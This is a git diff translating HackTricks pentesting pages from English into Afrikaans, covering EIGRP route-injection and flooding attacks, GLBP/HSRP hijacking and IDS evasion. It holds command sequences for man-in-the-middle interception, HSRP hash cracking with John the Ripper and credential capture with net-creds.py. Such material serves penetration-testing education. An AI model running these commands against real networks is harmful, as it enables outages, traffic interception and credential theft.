* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

118
generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
View file

@ -1,86 +1,86 @@
# EIGRP Attacks
# EIGRP Aanvalle
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
**This is a summary of the attacks exposed in** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Check it for further information.
**Hierdie is 'n opsomming van die aanvalle wat blootgestel word in** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Kyk daar vir verdere inligting.
## **Fake EIGRP Neighbors Attack**
- **Objective**: To overload router CPUs by flooding them with EIGRP hello packets, potentially leading to a Denial of Service (DoS) attack.
- **Tool**: **helloflooding.py** script.
- **Execution**:
%%%bash
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
%%%
## **Valse EIGRP Buurnavorsingsaanval**
- **Doelwit**: Om roeterverwerkers te oorlaai deur hulle te oorstroom met EIGRP-hallo-pakette, wat moontlik kan lei tot 'n Denial of Service (DoS)-aanval.
- **Instrument**: **helloflooding.py**-skrips.
- **Uitvoering**:
%%%bash
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
%%%
- **Parameters**:
- `--interface`: Specifies the network interface, e.g., `eth0`.
- `--as`: Defines the EIGRP autonomous system number, e.g., `1`.
- `--subnet`: Sets the subnet location, e.g., `10.10.100.0/24`.
- `--interface`: Spesifiseer die netwerkinterface, bv. `eth0`.
- `--as`: Definieer die EIGRP outonome stelselnommer, bv. `1`.
- `--subnet`: Stel die subnetligging in, bv. `10.10.100.0/24`.
## **EIGRP Blackhole Attack**
## **EIGRP Swartgate-aanval**
- **Objective**: To disrupt network traffic flow by injecting a false route, leading to a blackhole where the traffic is directed to a non-existent destination.
- **Tool**: **routeinject.py** script.
- **Execution**:
%%%bash
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
%%%
- **Doelwit**: Om netwerkverkeersvloei te ontwrig deur 'n valse roete in te spuit, wat lei tot 'n swartgate waar die verkeer na 'n nie-bestaande bestemming gerig word.
- **Instrument**: **routeinject.py**-skrips.
- **Uitvoering**:
%%%bash
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
%%%
- **Parameters**:
- `--interface`: Specifies the attackers system interface.
- `--as`: Defines the EIGRP AS number.
- `--src`: Sets the attackers IP address.
- `--dst`: Sets the target subnet IP.
- `--prefix`: Defines the mask of the target subnet IP.
- `--interface`: Spesifiseer die aanvaller se stelselkoppelvlak.
- `--as`: Definieer die EIGRP AS-nommer.
- `--src`: Stel die aanvaller se IP-adres in.
- `--dst`: Stel die teikensubnet-IP in.
- `--prefix`: Definieer die masker van die teikensubnet-IP.
## **Abusing K-Values Attack**
## **Misbruik van K-Waardes-aanval**
- **Objective**: To create continuous disruptions and reconnections within the EIGRP domain by injecting altered K-values, effectively resulting in a DoS attack.
- **Tool**: **relationshipnightmare.py** script.
- **Execution**:
%%%bash
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
%%%
- **Doelwit**: Om voortdurende ontwrigting en herverbindings binne die EIGRP-domein te skep deur gewysigde K-waardes in te spuit, wat effektief lei tot 'n DoS-aanval.
- **Instrument**: **relationshipnightmare.py**-skrips.
- **Uitvoering**:
%%%bash
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
%%%
- **Parameters**:
- `--interface`: Specifies the network interface.
- `--as`: Defines the EIGRP AS number.
- `--src`: Sets the IP Address of a legitimate router.
- `--interface`: Spesifiseer die netwerkinterface.
- `--as`: Definieer die EIGRP AS-nommer.
- `--src`: Stel die IP-adres van 'n geldige roeterverwerker in.
## **Routing Table Overflow Attack**
## **Roetertabel-oorloopaanval**
- **Objective**: To strain the router's CPU and RAM by flooding the routing table with numerous false routes.
- **Tool**: **routingtableoverflow.py** script.
- **Execution**:
%%%bash
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
%%%
- **Doelwit**: Om die roeterverwerker se CPU en RAM te belas deur die roetertabel met talle valse roetes te oorstroom.
- **Instrument**: **routingtableoverflow.py**-skrips.
- **Uitvoering**:
%%%bash
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
%%%
- **Parameters**:
- `--interface`: Specifies the network interface.
- `--as`: Defines the EIGRP AS number.
- `--src`: Sets the attackers IP address.
- `--interface`: Spesifiseer die netwerkinterface.
- `--as`: Definieer die EIGRP AS-nommer.
- `--src`: Stel die aanvaller se IP-adres in.
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

196
generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
View file

@ -1,63 +1,62 @@
# GLBP & HSRP Attacks
# GLBP & HSRP Aanvalle
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## FHRP Hijacking Overview
## FHRP Kapingsoorsig
### Insights into FHRP
FHRP is designed to provide network robustness by merging multiple routers into a single virtual unit, thereby enhancing load distribution and fault tolerance. Cisco Systems introduced prominent protocols in this suite, such as GLBP and HSRP.
### Insig in FHRP
FHRP is ontwerp om netwerk-robuustheid te bied deur verskeie roeteryers in 'n enkele virtuele eenheid te kombineer, wat sodoende lasverspreiding en fouttoleransie verbeter. Cisco Systems het prominente protokolle in hierdie pakket geïntroduceer, soos GLBP en HSRP.
### GLBP Protocol Insights
Cisco's creation, GLBP, functions on the TCP/IP stack, utilizing UDP on port 3222 for communication. Routers in a GLBP group exchange "hello" packets at 3-second intervals. If a router fails to send these packets for 10 seconds, it is presumed to be offline. However, these timers are not fixed and can be modified.
### GLBP-protokol-insig
GLBP, 'n skepping van Cisco, werk op die TCP/IP-stapel en maak gebruik van UDP op poort 3222 vir kommunikasie. Roeteryers in 'n GLBP-groep ruil "hallo" pakkies uit met tussenposes van 3 sekondes. As 'n roeteryer nie hierdie pakkies vir 10 sekondes stuur nie, word dit as aflyn beskou. Hierdie tydmetings is egter nie vas nie en kan gewysig word.
### GLBP Operations and Load Distribution
GLBP stands out by enabling load distribution across routers using a single virtual IP coupled with multiple virtual MAC addresses. In a GLBP group, every router is involved in packet forwarding. Unlike HSRP/VRRP, GLBP offers genuine load balancing through several mechanisms:
### GLBP-bedrywighede en lasverspreiding
GLBP onderskei homself deur lasverspreiding oor roeteryers moontlik te maak deur gebruik te maak van 'n enkele virtuele IP gekoppel aan verskeie virtuele MAC-adresse. In 'n GLBP-groep is elke roeteryer betrokke by pakketsending. In teenstelling met HSRP/VRRP bied GLBP ware lasbalansering deur verskeie meganismes:
- **Host-Dependent Load Balancing:** Maintains consistent AVF MAC address assignment to a host, essential for stable NAT configurations.
- **Round-Robin Load Balancing:** The default approach, alternating AVF MAC address assignment among requesting hosts.
- **Weighted Round-Robin Load Balancing:** Distributes load based on predefined "Weight" metrics.
- **Gasheer-afhanklike lasbalansering:** Handhaaf 'n konstante AVF MAC-adres toewysing aan 'n gasheer, wat noodsaaklik is vir stabiele NAT-konfigurasies.
- **Round-Robin Lasbalansering:** Die verstekbenadering, waar AVF MAC-adres toewysing afwisselend aan versoekende gasheerders gedoen word.
- **Geweegde Round-Robin Lasbalansering:** Versprei die las gebaseer op voorafbepaalde "Gewig" metriek.
### Key Components and Terminologies in GLBP
- **AVG (Active Virtual Gateway):** The main router, responsible for allocating MAC addresses to peer routers.
- **AVF (Active Virtual Forwarder):** A router designated to manage network traffic.
- **GLBP Priority:** A metric that determines the AVG, starting at a default of 100 and ranging between 1 and 255.
- **GLBP Weight:** Reflects the current load on a router, adjustable either manually or through Object Tracking.
- **GLBP Virtual IP Address:** Serves as the network's default gateway for all connected devices.
### Sleutelkomponente en terminologieë in GLBP
- **AVG (Aktiewe Virtuele Gateway):** Die hoofroeteryer, verantwoordelik vir die toekenning van MAC-adresse aan eweknie-roeteryers.
- **AVF (Aktiewe Virtuele Stuurder):** 'n Roeteryer wat aangewys is om netwerkverkeer te bestuur.
- **GLBP-prioriteit:** 'n Metriek wat die AVG bepaal, begin by 'n verstekwaarde van 100 en wissel tussen 1 en 255.
- **GLBP-gewig:** Weerspieël die huidige las op 'n roeteryer, wat handmatig of deur middel van Objekopsporing aangepas kan word.
- **GLBP Virtuele IP-adres:** Diens as die netwerk se verstekpoort vir alle gekoppelde toestelle.
For interactions, GLBP employs the reserved multicast address 224.0.0.102 and UDP port 3222. Routers transmit "hello" packets at 3-second intervals, and are considered non-operational if a packet is missed over a 10-second duration.
Vir interaksie maak GLBP gebruik van die voorbehoude multicast-adres 224.0.0.102 en UDP-poort 3222. Roeteryers stuur "hallo" pakkies uit met tussenposes van 3 sekondes, en word as nie-operasioneel beskou as 'n pakkie oor 'n tydperk van 10 sekondes gemis word.
### GLBP Attack Mechanism
An attacker can become the primary router by sending a GLBP packet with the highest priority value (255). This can lead to DoS or MITM attacks, allowing traffic interception or redirection.
### GLBP-aanvalsmeganisme
'n Aanvaller kan die primêre roeteryer word deur 'n GLBP-pakket met die hoogste prioriteitswaarde (255) te stuur. Dit kan lei tot DoS- of MITM-aanvalle, wat verkeersonderskepping of omleiding moontlik maak.
### Executing a GLBP Attack with Loki
[Loki](https://github.com/raizo62/loki_on_kali) can perform a GLBP attack by injecting a packet with priority and weight set to 255. Pre-attack steps involve gathering information like the virtual IP address, authentication presence, and router priority values using tools like Wireshark.
### Uitvoering van 'n GLBP-aanval met Loki
[Loki](https://github.com/raizo62/loki_on_kali) kan 'n GLBP-aanval uitvoer deur 'n pakket in te spuit met prioriteit en gewig wat op 255 gestel is. Voor-aanvalstappe behels die versameling van inligting soos die virtuele IP-adres, die teenwoordigheid van verifikasie en die prioriteitswaardes van die roeteryer deur middel van hulpmiddels soos Wireshark.
Attack Steps:
1. Switch to promiscuous mode and enable IP forwarding.
2. Identify the target router and retrieve its IP.
3. Generate a Gratuitous ARP.
4. Inject a malicious GLBP packet, impersonating the AVG.
5. Assign a secondary IP address to the attacker's network interface, mirroring the GLBP virtual IP.
6. Implement SNAT for complete traffic visibility.
7. Adjust routing to ensure continued internet access through the original AVG router.
Aanvalstappe:
1. Skakel na promiskueuse modus en aktiveer IP-deurstuur.
2. Identifiseer die teikenroeteryer en haal sy IP op.
3. Genereer 'n Gratis ARP.
4. Spuit 'n kwaadwillige GLBP-pakket in, wat die AVG naboots.
5. Ken 'n sekondêre IP-adres toe aan die aanvaller se netwerkinterface, wat die GLBP virtuele IP naboots.
6. Implementeer SNAT vir volledige verkeersigbaarheid.
7. Pas roetebepaling aan om voortgesette internettoegang deur die oorspronklike AVG-roeteryer te verseker.
By following these steps, the attacker positions themselves as a "man in the middle," capable of intercepting and analyzing network traffic, including unencrypted or sensitive data.
For demonstration, here are the required command snippets:
Deur hierdie stappe te volg, plaas die aanvaller homself as 'n "man in die middel", wat in staat is om netwerkverkeer te onderskep en te analiseer, insluitend onversleutelde of sensitiewe data.
Vir demonstrasie, hier is die vereiste opdragfragmente:
```bash
# Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on
@ -71,82 +70,79 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
```
### Passiewe Verduideliking van HSRP-ontvoering met Opdragbesonderhede
Monitoring and intercepting traffic can be done using net-creds.py or similar tools to capture and analyze data flowing through the compromised network.
#### Oorsig van HSRP (Hot Standby Router/Redundancy Protocol)
HSRP is 'n Cisco-eienaardige protokol wat ontwerp is vir netwerkgateway-herstelbaarheid. Dit maak die konfigurasie van verskeie fisiese roeteryers moontlik in 'n enkele logiese eenheid met 'n gedeelde IP-adres. Hierdie logiese eenheid word bestuur deur 'n primêre router wat verantwoordelik is vir die rigting van verkeer. In teenstelling met GLBP, wat metriese soos prioriteit en gewig gebruik vir vragbalansering, steun HSRP op 'n enkele aktiewe router vir verkeersbestuur.
### Passive Explanation of HSRP Hijacking with Command Details
#### Rolle en Terminologie in HSRP
- **HSRP Aktiewe Router**: Die toestel wat as die gateway optree en verkeersvloei bestuur.
- **HSRP Standby Router**: 'n Rugsteunroeter wat gereed is om oor te neem as die aktiewe router misluk.
- **HSRP Groep**: 'n Stel roeteryers wat saamwerk om 'n enkele veerkragtige virtuele router te vorm.
- **HSRP MAC-adres**: 'n Virtuele MAC-adres wat aan die logiese router in die HSRP-opstelling toegewys is.
- **HSRP Virtuele IP-adres**: Die virtuele IP-adres van die HSRP-groep wat optree as die verstekroete vir gekoppelde toestelle.
#### Overview of HSRP (Hot Standby Router/Redundancy Protocol)
HSRP is a Cisco proprietary protocol designed for network gateway redundancy. It allows the configuration of multiple physical routers into a single logical unit with a shared IP address. This logical unit is managed by a primary router responsible for directing traffic. Unlike GLBP, which uses metrics like priority and weight for load balancing, HSRP relies on a single active router for traffic management.
#### HSRP-weergawes
HSRP kom in twee weergawes voor, HSRPv1 en HSRPv2, wat hoofsaaklik verskil in groepskapasiteit, multicast IP-gebruik en virtuele MAC-adresstruktuur. Die protokol maak gebruik van spesifieke multicast IP-adresse vir diensinligtinguitruiling, met Hello-pakette wat elke 3 sekondes gestuur word. 'n Router word as onaktief beskou as geen pakket binne 'n interval van 10 sekondes ontvang word nie.
#### Roles and Terminology in HSRP
- **HSRP Active Router**: The device acting as the gateway, managing traffic flow.
- **HSRP Standby Router**: A backup router, ready to take over if the active router fails.
- **HSRP Group**: A set of routers collaborating to form a single resilient virtual router.
- **HSRP MAC Address**: A virtual MAC address assigned to the logical router in the HSRP setup.
- **HSRP Virtual IP Address**: The virtual IP address of the HSRP group, acting as the default gateway for connected devices.
#### HSRP-aanvalsmeganisme
HSRP-aanvalle behels die gedwonge oorneem van die rol van die Aktiewe Router deur 'n maksimum prioriteitswaarde in te spuit. Dit kan lei tot 'n Man-In-The-Middle (MITM) aanval. Essensiële voor-aanvalstappe sluit in die versameling van data oor die HSRP-opstelling, wat gedoen kan word deur Wireshark vir verkeersanalise.
#### HSRP Versions
HSRP comes in two versions, HSRPv1 and HSRPv2, differing mainly in group capacity, multicast IP usage, and virtual MAC address structure. The protocol utilizes specific multicast IP addresses for service information exchange, with Hello packets sent every 3 seconds. A router is presumed inactive if no packet is received within a 10-second interval.
#### Stappe om HSRP-verifikasie te omseil
1. Stoor die netwerkverkeer wat HSRP-data bevat as 'n .pcap-lêer.
```shell
tcpdump -w hsrp_traffic.pcap
```
2. Haal MD5-hashes uit die .pcap-lêer met behulp van hsrp2john.py.
```shell
python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
```
3. Kraak die MD5-hashes met behulp van John the Ripper.
```shell
john --wordlist=mywordlist.txt hsrp_hashes
```
#### HSRP Attack Mechanism
HSRP attacks involve forcibly taking over the Active Router's role by injecting a maximum priority value. This can lead to a Man-In-The-Middle (MITM) attack. Essential pre-attack steps include gathering data about the HSRP setup, which can be done using Wireshark for traffic analysis.
**Uitvoering van HSRP-inspuiting met Loki**
#### Steps for Bypassing HSRP Authentication
1. Save the network traffic containing HSRP data as a .pcap file.
```shell
tcpdump -w hsrp_traffic.pcap
```
2. Extract MD5 hashes from the .pcap file using hsrp2john.py.
```shell
python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
```
3. Crack the MD5 hashes using John the Ripper.
```shell
john --wordlist=mywordlist.txt hsrp_hashes
```
1. Begin Loki om HSRP-advertensies te identifiseer.
2. Stel die netwerkinterface in promiskue modus en aktiveer IP-deurstuur.
```shell
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1
```
3. Gebruik Loki om die spesifieke router te teiken, voer die gekraakte HSRP-wagwoord in en doen die nodige konfigurasies om die Aktiewe Router na te boots.
4. Nadat die Aktiewe Router-rol verkry is, konfigureer jou netwerkinterface en IP-tabelle om die wettige verkeer te onderskep.
```shell
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
```
5. Wysig die roetetabel om verkeer deur die vorige Aktiewe Router te roeteer.
```shell
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
```
6. Gebruik net-creds.py of 'n soortgelyke hulpprogram om legitimasie-inligting van die onderskepte verkeer vas te vang.
```shell
sudo python2 net-creds.py -i eth0
```
**Executing HSRP Injection with Loki**
1. Launch Loki to identify HSRP advertisements.
2. Set the network interface to promiscuous mode and enable IP forwarding.
```shell
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1
```
3. Use Loki to target the specific router, input the cracked HSRP password, and perform necessary configurations to impersonate the Active Router.
4. After gaining the Active Router role, configure your network interface and IP tables to intercept the legitimate traffic.
```shell
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
```
5. Modify the routing table to route traffic through the former Active Router.
```shell
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
```
6. Use net-creds.py or a similar utility to capture credentials from the intercepted traffic.
```shell
sudo python2 net-creds.py -i eth0
```
Executing these steps places the attacker in a position to intercept and manipulate traffic, similar to the procedure for GLBP hijacking. This highlights the vulnerability in redundancy protocols like HSRP and the need for robust security measures.
Deur hierdie stappe uit te voer, plaas die aanvaller hom in 'n posisie om verkeer te onderskep en te manipuleer, soortgelyk aan die prosedure vir GLBP-ontvoering. Dit beklemtoon die kwesbaarheid in herstelbaarheidsprotokolle soos HSRP en die behoefte aan robuuste sekuriteitsmaatreëls.
## References
## Verwysings
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

76
generic-methodologies-and-resources/pentesting-network/ids-evasion.md
View file

@ -1,75 +1,71 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
# **TTL Manipulation**
# **TTL-manipulasie**
Send some packets with a TTL enough to arrive to the IDS/IPS but not enough to arrive to the final system. And then, send another packets with the same sequences as the other ones so the IPS/IDS will think that they are repetitions and won't check them, but indeed they are carrying the malicious content.
Stuur 'n paar pakkies met 'n TTL wat genoeg is om by die IDS/IPS aan te kom, maar nie genoeg om by die finale stelsel aan te kom nie. En stuur dan nog pakkies met dieselfde volgorde as die ander sodat die IPS/IDS dink dat dit herhalings is en dit nie sal ondersoek nie, maar in werklikheid dra hulle die skadelike inhoud.
**Nmap option:** `--ttlvalue <value>`
**Nmap-opsie:** `--ttlvalue <waarde>`
# Avoiding signatures
# Ontwyk handtekeninge
Just add garbage data to the packets so the IPS/IDS signature is avoided.
Voeg net rommeldata by die pakkies sodat die IPS/IDS-handtekening vermy word.
**Nmap option:** `--data-length 25`
**Nmap-opsie:** `--data-length 25`
# **Fragmented Packets**
# **Gefragmenteerde pakkies**
Just fragment the packets and send them. If the IDS/IPS doesn't have the ability to reassemble them, they will arrive to the final host.
Fragmenteer net die pakkies en stuur hulle. As die IDS/IPS nie die vermoë het om hulle weer saam te stel nie, sal hulle by die finale gasheer aankom.
**Nmap option:** `-f`
**Nmap-opsie:** `-f`
# **Invalid** _**checksum**_
# **Ongeldige** _**kontrolesom**_
Sensors usually don't calculate checksum for performance reasons. So an attacker can send a packet that will be **interpreted by the sensor but rejected by the final host.** Example:
